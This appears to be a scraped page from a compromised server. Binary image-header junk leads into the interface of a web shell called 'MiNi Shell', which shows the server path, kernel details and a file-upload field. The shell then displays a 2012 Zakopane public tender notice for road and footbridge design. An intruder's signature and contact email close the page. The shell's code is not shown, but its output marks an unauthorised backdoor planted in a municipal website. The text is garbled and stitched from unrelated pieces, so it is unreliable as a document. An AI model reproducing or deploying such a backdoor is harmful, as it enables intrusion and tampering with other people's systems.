JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120531/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120531/120409-N-2012.html

<p class="kh_header"><b>Zakopane: BZP.271.58.2012 wykonanie dokumentacji projektowo - kosztorysowej przebudowy- rozbudowy drogi gminnej, prowadzonej w procedurze ZRID, dla zadania  inwestycyjnego nr 2011/73 o nazwie Przebudowa ul. Tatary w Zakopanem.</b><br>
<b>Numer ogłoszenia: 120409 - 2012; data zamieszczenia: 31.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BZP.271.58.2012 wykonanie dokumentacji projektowo - kosztorysowej przebudowy- rozbudowy drogi gminnej, prowadzonej w procedurze ZRID, dla zadania  inwestycyjnego nr 2011/73 o nazwie Przebudowa ul. Tatary w Zakopanem..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.Wykonanie dokumentacji projektowo - kosztorysowej przebudowy- rozbudowy drogi gminnej, prowadzonej w procedurze ZRID, dla zadania  inwestycyjnego nr 2011/73 o nazwie Przebudowa ul. Tatary w Zakopanem. 
3.1.	Zakres przedmiotu zamówienia obejmuje :
Przedmiot zamówienia obejmuje wykonanie  dokumentacji projektowo-kosztorysowej drogi publicznej gminnej, klasy L o długości ok. 1 000 m ( od skrzyżowania z ul. Kamieniec do skrzyżowania z ul. Szpitalną)  oraz przebudowy ciągu pieszego od ul. Tatary do kładki przy ul. Kasprowicza wraz z kładką dla pieszych, która winna się składać w szczególności z rozwiązań przebudowy/rozbudowy: 

3.1.1.	 konstrukcji jezdni,
3.1.2.	zjazdów,
3.1.3.	 chodników, 
3.1.4.	 urządzeń bezpieczeństwa ruchu,
3.1.5.	remontu-przebudowy infrastruktury obcej, w szczególności sieci elektro - 
           energetycznej zasilającej oświetlenie uliczne i posesje wzdłuż drogi,
3.1.6.	 sieci    oświetlenia ulicznego,
3.1.7.	systemu odwodnienia dróg,
3.1.8.	kładki dla pieszych na potoku Cicha Woda
3.2.	W ramach dokumentacji należy :
3.2.1.	sporządzić bądź pozyskać aktualną mapę sytuacyjno - wysokościową i ewidencyjną, zawierająca wszystkie naniesienia niezbędne do wykonania dokumentacji projektowo - kosztorysowej drogi,
3.2.2.	ustalić dane dotyczące przebiegu infrastruktury technicznej w projektowanym pasie drogowym na podstawie danych uzyskanych z podkładów mapowych i rozeznania w terenie,
3.2.3.	zaprojektować zabezpieczenie infrastruktury technicznej w razie potrzeby zaproponować rozwiązanie kolizji sieci (skablowanie sieci teletechnicznej),
3.2.4.	uwzględnić wycinkę drzew kolidujących z uzyskaniem wymaganych parametrów drogi lub ich zabezpieczenie,
3.2.5.	pozyskać badania nośności podłoża, kruszyw gruntów i ugięć,
3.2.6.	wykonać projekt remontu/ przebudowy kładki dla pieszych na potoku Cicha Woda, na podstawie ekspertyzy technicznej obiektu mostowego,
3.2.7.	przedstawić rozwiązania odwodnienia korpusu drogi wraz z odprowadzeniem do odbiorników,
3.2.8.	przedstawić rozwiązania przebudowy-rozbudowy sieci oświetlenia ulicznego 
3.2.9.	przedstawić rozwiązania projektowe dla charakterystycznych elementów projektowanej drogi (np. przebieg drogi, skrzyżowania) na podstawie koncepcji
3.2.10.	opracować i przedstawić Zamawiającemu do zatwierdzenia dokumentację projektowo - kosztorysową, we wszystkich branżach wynikających ze specyfiki opracowania,
3.2.11.	wykonać wykaz właścicieli nieruchomości objętych inwestycją w wersji elektronicznej (Excel), z podaniem numerów działek i adresów, oparty na zapisach w księgach wieczystych wraz z podaniem ilości proponowanych podziałów dla wybranego przez Zamawiającego wariantu,
3.2.12.	pozyskać wszystkie wymagane opinie, uzgodnienia i decyzje wynikające ze specyfiki opracowania i niezbędne do uzyskania pozwolenia na budowę
3.2.13.	sporządzić operaty podziałowe pod projektowany pas drogowy 
3.2.14.	przygotować kompletny wniosek wraz z załącznikami do uzyskania decyzji pozwalającej na realizację prac budowlanych w procedurze ZRID,
3.2.15.	opracować i przedstawić Zamawiającemu projekt docelowej organizacji ruchu wraz z uzyskaniem stosownych zatwierdzeń,
3.2.16.	uczestniczyć w konsultacjach społecznych,
3.2.17.	w opracowaniu należy uwzględnić przystosowanie do poruszania się osób niepełnosprawnych zgodnie z Zarządzeniem Nr 43/2010 Burmistrza Miasta Zakopane z dnia 8.03.2010r., w sprawie wymogów, jakim powinny odpowiadać przejścia dla pieszych, przejścia podziemne, przejścia naziemne, pochylnie, schody zewnętrzne, windy i chodniki z uwagi na potrzeby osób niepełnosprawnych,
3.2.18.	opracować i przedstawić Zamawiającemu do zatwierdzenia Szczegółowe Specyfikacje Techniczne Wykonania i Odbioru Robót na wszystkie elementy realizowanych robót, dostosowane do specyfiki i skomplikowania realizowanych robót,

3.3.	Dokumentacja powinna zawierać rozwiązania architektoniczno-budowlane, które będą zgodne z warunkami technicznymi, jakim powinny odpowiadać tego typu obiekty inżynierskie, a w szczególności:
3.3.1.	racjonalne rozwiązania lokalizacji i efektywne zagospodarowanie przestrzeni   
           przeznaczonej pod inwestycję,
3.3.2.	rozwiązanie komunikacji z przyległymi pasami drogowymi i terenami, 
            z uwzględnieniem dostosowania do poruszania się osób niepełnosprawnych,
3.3.3.	rozwiązania odwodnień łącznie z ich wylotem do istniejących odbiorników.
3.3.4.	dowiązanie elementów projektowanej inwestycji do stanu istniejącego
3.4.	Forma opracowania dokumentacji -dokumentacja zbroszurowana (w sposób umożliwiający bezpośrednie wpięcie do segregatora biurowego) w ilości:
3.4.1.	projekt budowlany 6szt.
3.4.2.	projekt wykonawczy uzupełniający projekt budowlany 6 szt., 
3.4.3.	specyfikacje istotnych warunków wykonania i odbioru robót 6 szt.,
3.4.4.	przedmiar robót (kosztorys ślepy) 2 szt.,
3.4.5.	kosztorys inwestorski 2 szt.,
3.5.	dokumentacja elektroniczna w formacie Word, PDF oraz dodatkowo kosztorys inwestorski w zapisie umożliwiającym odczyt w formacie Excel,
3.6.	układ i zawartość dokumentacji w wersji elektronicznej (np. nazwy poszczególnych katalogów i plików, podpisy i pieczątki osób sporządzających dokumentację - projektant, sprawdzający, wykonujący, weryfikator, uzgodnienia, itp.) powinny być identyczne z wersją papierową. Dokumentacja w formie elektronicznej powinna być odpowiednikiem wersji papierowej, wraz ze stosownymi podpisami i klauzulami,

3.7.	Dokumentacja powinna być zgodna z obowiązującymi przepisami, w tym:
3.7.1.	Ustawie z dnia 7 lipca 1994 roku prawo budowlane (tekst jednolity: Dz. U. 2010r. nr 243, poz. 1623 z późn. zm.);
3.7.2.	Ustawie z dnia 21 marca 1985 r. o drogach publicznych (tekst jednolity: (Dz. U. z 2007r. nr 19, poz. 115, z późn. zm.);
3.7.3.	Rozporządzeniu Ministra Transportu i Gospodarki Morskiej z dnia 30 maja 2000 r. w 
           sprawie warunków technicznych, jakim powinny odpowiadać drogowe obiekty 
           inżynierskie i ich usytuowanie (tekst jednolity: Dz. U. z 2000r. nr 63, poz.735, z późn. 
            zm.);
3.7.4.	Rozporządzeniu Ministra Transportu i Gospodarki Morskiej z dnia 
            02 marca1999 w sprawie warunków technicznych, jakim powinny odpowiadać drogi    
            publiczne i ich usytuowanie (tekst jednolity: Dz. U. z 1999r., Nr 43, poz. 430 z późn. 
            zm.),
3.7.5.	Ustawie z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania 
            i realizacji inwestycji w zakresie dróg publicznych (Dz. U. z 2008r., Nr 193, poz. 1194   
             z późn. zm.).

3.8.	Wykonawca udzieli co najmniej 36-cio miesięcznej gwarancji na wykonane prace projektowe objęte przedmiotowym zamówieniem, od końca okresu gwarancji dla robot budowlanych opartych na dokumentacji będącej przedmiotem  niniejszego zamówienia.
3.9.	Wykonawca udzieli co najmniej 12-sto miesięcznej rękojmi na wykonane prace projektowe objęte przedmiotowym zamówieniem, od końca okresu gwarancji dla robot budowlanych opartych na dokumentacji będącej przedmiotem  niniejszego zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 11. Wadium przetargowe
11.1	Każdy wykonawca jest zobowiązany wnieść wadium przetargowe    
    w wysokości  1 600,00  zł  ( słownie:  jeden tysiąc sześćset  złotych)
11.2	Wadium może być wnoszone w jednej lub w kilku  następujących formach: 
       11.2.1. pieniądzu;
       11.2.2.poręczeniach bankowych lub poręczeniach spółdzielczej kasy 
                  oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze 
                  poręczeniem pieniężnym;
      11.2.3. poręczeniach bankowych;
      11.2.4. gwarancjach bankowych;
      11.2.5. gwarancjach ubezpieczeniowych;
      11.2.6. poręczeniach udzielanych przez podmioty, o których mowa w art. 6 lit. b ust. 
                5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji   
                 Rozwoju Przedsiębiorczości ((Dz.U z 2007r. Nr 42 poz.275 z późn. zm.) 

11.3.	Wadium przetargowe w  pieniądzu należy wnieść  przelewem na konto Urzędu   
   Miasta Zakopane w PEKAO S.A. w Zakopanem nr: 85 1240 4748 1111 0000 4871 8666   
    Wadium powinno znajdować się na koncie zamawiającego najpóźniej   
    w terminie składania ofert tj 15 czerwca .2012 r. do godz.  12°°

11.4.Wadium wnoszone w pozostałych formach należy złożyć w postaci oryginału,   
        najpóźniej w terminie składania ofert tj. 15 czerwca  2012 r. do godz. 12°° w  Biurze    ds. zamówień publicznych pok. nr 8 (parter).
        
  11.4.1. UWAGA! Nie wolno oryginałów tych dokumentów wkładać do oferty.

  11.5.   Zwrot wadium  
         11.5.1. Zamawiający zwraca wadium  wszystkim wykonawcom niezwłocznie po 
                     wyborze oferty   najkorzystniejszej lub unieważnieniu postępowania, z 
                     wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza , z 
                     zastrzeżeniem ,że  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli 
                     wykonawca w odpowiedzi na  wezwanie, o którym mowa w art. 26 ust. 3ustawy       
                     nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1   
                     ustawy,  lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn 
                     nieleżących po jego stronie. 

      11.5.2. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy który 
                    wycofał ofertę przed upływem terminu składania ofert;
          11.5.3. Zamawiający żąda  ponownego wniesienia wadium przez wykonawcę którym 
                      zwrócono wadium na podstawie ust.1  jeżeli w wyniku  ostatecznego  
                       rozstrzygnięcia protestu jego oferta została  wybrana jako najkorzystniejsza.     
                       Wykonawca wnosi wadium  w terminie określonym przez Zamawiającego.
          11.5.4. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami   
                      wynikającymi z umowy rachunku bankowego, na którym było ono  
                       przechowywane, pomniejszone o koszty prowadzenia rachunku banko?wego   
                       oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany 
                       przez wykonawcę.
    
         11.5.5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego 
                      oferta została wybrana:
     11.5.5.1. odmówił podpisania umowy w sprawie zamówienia publicznego na 
                    warunkach określonych w ofercie;
     11.5.5.2. nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
              11.5.5.3. zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe    
                             z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne 
                 oświadczenie
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub 
                  nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca wykaże ,że w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej 2 dokumentacje projektowo - kosztorysowe, prowadzone w procedurze ZRID, dla której uzyskano prawomocną decyzję pozwolenia na budowę, o zakresie odpowiadającym swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, tj. wykonaniem dokumentacji projektowo-kosztorysowej drogi o długości min. 1,0 km ( minimum jednego kilometra)

Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia  
               lub  nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone         
               do  oferty .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne 
                 oświadczenie
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub 
                  nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  zostanie uznany za spełniony ,jeżeli  wykonawca wykaże  ,że zapewni  
  wykonanie zamówienia przez  co najmniej jedną osobę posiadającą  
   uprawnienia do pełnienia funkcji projektanta bez ograniczeń w specjalności   
  drogowej  i co najmniej jedną osobę posiadającą  uprawnienia w specjalności  
  mostowej bez ograniczeń ,lub odpowiadające im, wydane na podstawie 
  wcześniejszych przepisów, należące do właściwej Izby Inżynierów Budownictwa.

        
 Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia   
                           lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone  
                           do oferty .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne 
                 oświadczenie
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub 
                  nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca ma załączyć do oferty wypełnione zestawienie asortymentu prac projektowych zgodnie ze wzorem  stanowiącym załącznik nr 8 do  siwz.
Zamawiający informuje, że zestawienie   asortymentu prac  projektowych służy jedynie pomocniczo do sporządzenia oferty, a wypełnione przez wykonawcę będzie załącznikiem do umowy o nazwie; tabela elementów rozliczeniowych i będzie służyło do wyliczenia zmniejszeń w przypadku niewykonania całego przedmiotu umowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W oparciu o art.144 ust.1 ustawy zamawiający informuje, że przewiduje   
           możliwość zmiany umowy :

-w przypadku zwłoki, z przyczyn nie leżących po stronie Wykonawcy, spowodowanej przedłużaniem się procedur administracyjnych lub przedłużającymi się uzgodnieniami Zamawiającego z właścicielami terenu przeznaczonego pod inwestycję, Zamawiający dopuszcza przedłużenie terminu wykonania umowy w formie aneksu, z zachowaniem przepisów ustawy o finansach publicznych,
- wykonawca może dokonywać zmiany projektantów, przedstawionych w ofercie,  w przypadku  utraty przez nich uprawnień , długotrwałej choroby, śmierci lub długoterminowego wyjazdu - jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nowego kluczowego projektanta, który musi się legitymować  wymaganymi uprawnieniami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamówienia  publiczne postępowania poniżej  wartości  art.11.8<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Rozwoju Lokalnego i Inwestycji
Urząd Miasta Zakopane
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2012 godzina 12:00, miejsce: Biuro ds zamówień publicznych pok.8
Urząd Miasta Zakopane
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com